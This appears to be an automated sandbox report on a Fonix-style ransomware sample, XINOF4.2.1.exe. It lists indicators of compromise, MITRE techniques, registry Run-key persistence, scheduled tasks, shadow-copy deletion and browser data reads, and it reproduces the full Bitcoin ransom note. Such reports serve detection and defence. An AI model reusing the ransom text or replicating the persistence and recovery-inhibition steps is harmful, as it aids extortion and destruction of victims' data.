acfa59b94beebb0f9c4dd6a4c21586b9648808629624612c53d099df388eadd3

Analysis

max time kernel
564s
max time network
18s
platform
windows7_x64
resource
win7v20201028
submitted
30-10-2020 07:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XINOF4.2.1.exe
Size

379KB
MD5

b33099e43bc639110baab265f19eaab8
SHA1

17b5517634e881ab6e832476c6c9d8702941dde1
SHA256

acfa59b94beebb0f9c4dd6a4c21586b9648808629624612c53d099df388eadd3
SHA512

ce777ff2247a56c2b1e44eb3dd7affa423022bc81fb3058f8041fa64e63032771b9ae46499d3d0e62111968c665e104ee4e1fa3aefd858cc81df6e3037366b22

Score

10^/10

discovery evasion persistence ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta

Ransom Note

All of your files have been encrypted! to DELETE all of your files... to avoid any problem READ THIS HELP CARFULLY All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send an email to [email protected] The crypter person username : satan your SYSTEM ID is : FA58F987 You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool. You have to 48 hours(2 Day) To contact or paying us After that, you have to Pay Double . in case of no answer in 6 hours email us at = [email protected] Attention! DO NOT pay any money before decrypting the test files. DO NOT trust any intermediary. they wont help you and you may be victim of scam. just email us , we help you in any steps. DO NOT reply to other emails. ONLY this two emails can help you. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. If the payment is not done after decryption, report the username to support email(along with evidence such as Transfer ID) What is our decryption guarantee? Before paying you can send us up to for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site.You have to register, click 'Buy bitcoins', and select the seller by payment method and price.https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ You only have LIMITED time to get back your files! if timer runs out and you dont pay us , all of files will be DELETED and yuor hard disk will be seriously DAMAGED. you will lose some of your data on day 2 in the timer. you can buy more time for pay. Just email us . THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) Regards-FonixTeam

Emails

[email protected]

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

XINOF4.2.1.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\UnlockImport.tiff	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Pictures\DenyComplete.tiff	XINOF4.2.1.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

328 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
328	icacls.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\XINOF.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Michael Gillespie = "C:\\ProgramData\\XINOF.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Michael Gillespie = "C:\\ProgramData\\XINOF.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\XINOF.exe"	reg.exe

Drops desktop.ini file(s) 40 IoCs

Processes:

XINOF4.2.1.exe

description	ioc	process
File opened for modification	C:\Users\Public\Libraries\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\5JH7AFHU\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\X6969WXQ\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\6O9TWDTA\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\XHJ74TZW\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Program Files\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	XINOF4.2.1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	XINOF4.2.1.exe

Enumerates connected drives 3 TTPs 49 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

XINOF4.2.1.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exe

description	ioc	process
File opened (read-only)	\??\I:	XINOF4.2.1.exe
File opened (read-only)	\??\L:	XINOF4.2.1.exe
File opened (read-only)	\??\O:	XINOF4.2.1.exe
File opened (read-only)	\??\U:	XINOF4.2.1.exe
File opened (read-only)	\??\K:	label.exe
File opened (read-only)	\??\O:	label.exe
File opened (read-only)	\??\H:	XINOF4.2.1.exe
File opened (read-only)	\??\M:	XINOF4.2.1.exe
File opened (read-only)	\??\A:	XINOF4.2.1.exe
File opened (read-only)	\??\R:	XINOF4.2.1.exe
File opened (read-only)	\??\T:	XINOF4.2.1.exe
File opened (read-only)	\??\Z:	XINOF4.2.1.exe
File opened (read-only)	\??\F:	XINOF4.2.1.exe
File opened (read-only)	\??\K:	XINOF4.2.1.exe
File opened (read-only)	\??\P:	XINOF4.2.1.exe
File opened (read-only)	\??\V:	XINOF4.2.1.exe
File opened (read-only)	\??\S:	label.exe
File opened (read-only)	\??\G:	XINOF4.2.1.exe
File opened (read-only)	\??\S:	XINOF4.2.1.exe
File opened (read-only)	\??\H:	label.exe
File opened (read-only)	\??\J:	label.exe
File opened (read-only)	\??\L:	label.exe
File opened (read-only)	\??\B:	label.exe
File opened (read-only)	\??\P:	label.exe
File opened (read-only)	\??\R:	label.exe
File opened (read-only)	\??\N:	XINOF4.2.1.exe
File opened (read-only)	\??\W:	XINOF4.2.1.exe
File opened (read-only)	\??\Y:	XINOF4.2.1.exe
File opened (read-only)	\??\Y:	label.exe
File opened (read-only)	\??\B:	XINOF4.2.1.exe
File opened (read-only)	\??\G:	label.exe
File opened (read-only)	\??\I:	label.exe
File opened (read-only)	\??\W:	label.exe
File opened (read-only)	\??\Z:	label.exe
File opened (read-only)	\??\D:	label.exe
File opened (read-only)	\??\E:	XINOF4.2.1.exe
File opened (read-only)	\??\Q:	XINOF4.2.1.exe
File opened (read-only)	\??\X:	XINOF4.2.1.exe
File opened (read-only)	\??\F:	label.exe
File opened (read-only)	\??\M:	label.exe
File opened (read-only)	\??\A:	label.exe
File opened (read-only)	\??\Q:	label.exe
File opened (read-only)	\??\U:	label.exe
File opened (read-only)	\??\J:	XINOF4.2.1.exe
File opened (read-only)	\??\X:	label.exe
File opened (read-only)	\??\N:	label.exe
File opened (read-only)	\??\T:	label.exe
File opened (read-only)	\??\V:	label.exe
File opened (read-only)	\??\E:	label.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe

Drops file in Program Files directory 14425 IoCs

Processes:

XINOF4.2.1.exe

description	ioc	process
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\DirectDB.dll	XINOF4.2.1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Help.txt	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Common Files\System\msadc\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqloledb.rll.mui	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.PPD	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBCAL.DPV	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Grid.thmx	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_center.gif	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\How To Decrypt Files.hta	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21309_.GIF	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46B.GIF	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique	XINOF4.2.1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\Help.txt	XINOF4.2.1.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\RPT2HTM4.XSL	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar	XINOF4.2.1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF	XINOF4.2.1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\misc\libexport_plugin.dll	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMES.CFG	XINOF4.2.1.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Baku	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC2.WMF	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\PSCONFIG.CHM	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Core.dll	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\How To Decrypt Files.hta	XINOF4.2.1.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ONBttnWD.dll	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\ENVELOPR.DLL	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityMergeFax.Dotx	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_flyout.png	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi	XINOF4.2.1.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\Help.txt	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\How To Decrypt Files.hta	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ESEN\Help.txt	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14866_.GIF	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml	XINOF4.2.1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css	XINOF4.2.1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\misc\libaudioscrobbler_plugin.dll	XINOF4.2.1.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\Cpriv.key	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0230553.WMF	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SlateBlue.css	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\OTKLOADR.DLL	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21400_.GIF	XINOF4.2.1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDEBARVERTBB.DPV	XINOF4.2.1.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\Cpriv.key	XINOF4.2.1.exe
File created	C:\Program Files\7-Zip\Lang\Cpriv.key	XINOF4.2.1.exe

Drops file in Windows directory 3 IoCs

Processes:

XINOF4.2.1.exe

description	ioc	process
File created	C:\Windows\Help.txt	XINOF4.2.1.exe
File created	C:\Windows\Cpriv.key	XINOF4.2.1.exe
File created	C:\Windows\How To Decrypt Files.hta	XINOF4.2.1.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1592 schtasks.exe
2032 schtasks.exe
1212 schtasks.exe
1252 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

856 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1604 taskkill.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

mshta.exe

pid process

1708 mshta.exe

pid	process
1592	schtasks.exe
2032	schtasks.exe
1212	schtasks.exe
1252	schtasks.exe

pid	process
856	vssadmin.exe

pid	process
1604	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1708	mshta.exe

Suspicious behavior: EnumeratesProcesses 73 IoCs

Processes:

XINOF4.2.1.exe

pid	process
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe
744	XINOF4.2.1.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

taskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2044	WMIC.exe
Token: SeSecurityPrivilege	2044	WMIC.exe
Token: SeTakeOwnershipPrivilege	2044	WMIC.exe
Token: SeLoadDriverPrivilege	2044	WMIC.exe
Token: SeSystemProfilePrivilege	2044	WMIC.exe
Token: SeSystemtimePrivilege	2044	WMIC.exe
Token: SeProfSingleProcessPrivilege	2044	WMIC.exe
Token: SeIncBasePriorityPrivilege	2044	WMIC.exe
Token: SeCreatePagefilePrivilege	2044	WMIC.exe
Token: SeBackupPrivilege	2044	WMIC.exe
Token: SeRestorePrivilege	2044	WMIC.exe
Token: SeShutdownPrivilege	2044	WMIC.exe
Token: SeDebugPrivilege	2044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2044	WMIC.exe
Token: SeRemoteShutdownPrivilege	2044	WMIC.exe
Token: SeUndockPrivilege	2044	WMIC.exe
Token: SeManageVolumePrivilege	2044	WMIC.exe
Token: 33	2044	WMIC.exe
Token: 34	2044	WMIC.exe
Token: 35	2044	WMIC.exe
Token: SeBackupPrivilege	1304	vssvc.exe
Token: SeRestorePrivilege	1304	vssvc.exe
Token: SeAuditPrivilege	1304	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2044	WMIC.exe
Token: SeSecurityPrivilege	2044	WMIC.exe
Token: SeTakeOwnershipPrivilege	2044	WMIC.exe
Token: SeLoadDriverPrivilege	2044	WMIC.exe
Token: SeSystemProfilePrivilege	2044	WMIC.exe
Token: SeSystemtimePrivilege	2044	WMIC.exe
Token: SeProfSingleProcessPrivilege	2044	WMIC.exe
Token: SeIncBasePriorityPrivilege	2044	WMIC.exe
Token: SeCreatePagefilePrivilege	2044	WMIC.exe
Token: SeBackupPrivilege	2044	WMIC.exe
Token: SeRestorePrivilege	2044	WMIC.exe
Token: SeShutdownPrivilege	2044	WMIC.exe
Token: SeDebugPrivilege	2044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2044	WMIC.exe
Token: SeRemoteShutdownPrivilege	2044	WMIC.exe
Token: SeUndockPrivilege	2044	WMIC.exe
Token: SeManageVolumePrivilege	2044	WMIC.exe
Token: 33	2044	WMIC.exe
Token: 34	2044	WMIC.exe
Token: 35	2044	WMIC.exe

Suspicious use of WriteProcessMemory 355 IoCs

Processes:

XINOF4.2.1.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 744 wrote to memory of 1900	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1900	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1900	744	XINOF4.2.1.exe	cmd.exe
PID 1900 wrote to memory of 1992	1900	cmd.exe	chcp.com
PID 1900 wrote to memory of 1992	1900	cmd.exe	chcp.com
PID 1900 wrote to memory of 1992	1900	cmd.exe	chcp.com
PID 744 wrote to memory of 2020	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 2020	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 2020	744	XINOF4.2.1.exe	cmd.exe
PID 2020 wrote to memory of 2032	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 2032	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 2032	2020	cmd.exe	schtasks.exe
PID 744 wrote to memory of 1160	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1160	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1160	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1184	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1184	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1184	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1224	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1224	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1224	744	XINOF4.2.1.exe	cmd.exe
PID 1224 wrote to memory of 1212	1224	cmd.exe	schtasks.exe
PID 1224 wrote to memory of 1212	1224	cmd.exe	schtasks.exe
PID 1224 wrote to memory of 1212	1224	cmd.exe	schtasks.exe
PID 744 wrote to memory of 2036	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 2036	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 2036	744	XINOF4.2.1.exe	cmd.exe
PID 2036 wrote to memory of 1896	2036	cmd.exe	attrib.exe
PID 2036 wrote to memory of 1896	2036	cmd.exe	attrib.exe
PID 2036 wrote to memory of 1896	2036	cmd.exe	attrib.exe
PID 744 wrote to memory of 1776	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1776	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1776	744	XINOF4.2.1.exe	cmd.exe
PID 1776 wrote to memory of 1320	1776	cmd.exe	reg.exe
PID 1776 wrote to memory of 1320	1776	cmd.exe	reg.exe
PID 1776 wrote to memory of 1320	1776	cmd.exe	reg.exe
PID 744 wrote to memory of 1708	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1708	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1708	744	XINOF4.2.1.exe	cmd.exe
PID 1708 wrote to memory of 1780	1708	cmd.exe	reg.exe
PID 1708 wrote to memory of 1780	1708	cmd.exe	reg.exe
PID 1708 wrote to memory of 1780	1708	cmd.exe	reg.exe
PID 744 wrote to memory of 1800	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1800	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1800	744	XINOF4.2.1.exe	cmd.exe
PID 1800 wrote to memory of 1668	1800	cmd.exe	reg.exe
